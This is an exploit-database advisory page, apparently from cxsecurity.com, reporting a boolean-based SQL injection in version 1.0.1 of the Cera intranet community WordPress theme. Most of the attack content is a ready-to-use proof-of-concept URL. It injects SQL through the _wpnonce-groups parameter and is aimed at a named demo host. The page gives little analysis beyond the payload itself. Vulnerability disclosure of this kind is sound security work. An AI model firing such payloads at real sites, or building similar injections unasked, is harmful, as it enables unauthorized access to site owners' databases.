cera-intranet-community-theme SQL Injection

2020.01.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

=========================================================================================== # Exploit Title: cera-intranet-community-theme SQL Inj. # Dork: N/A # Date: 29-12-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://themeforest.net/item/cera-intranet-community-theme/24872621 # Software Link: https://themeforest.net/item/cera-intranet-community-theme/24872621 # Version: v1.0.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: N/A =========================================================================================== # POC - SQLi (Boolean Based) # Parameters : _wpnonce-groups # Attack Pattern : https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f%27/**/aNd/**/5468967=5468967/**/aNd/**/%276199%27=%276199 # GET Method : https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f ===========================================================================================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top